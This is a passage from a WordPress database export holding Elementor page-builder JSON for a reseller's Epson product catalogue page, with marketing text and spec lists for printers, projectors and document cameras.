]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7881,3469,'_elementor_version','2.5.14'),(7884,3470,'_wp_page_template','template-fullwidth.php'),(7885,3470,'_elementor_edit_mode','builder'),(7886,3470,'_elementor_template_type','post'),(7887,3470,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" 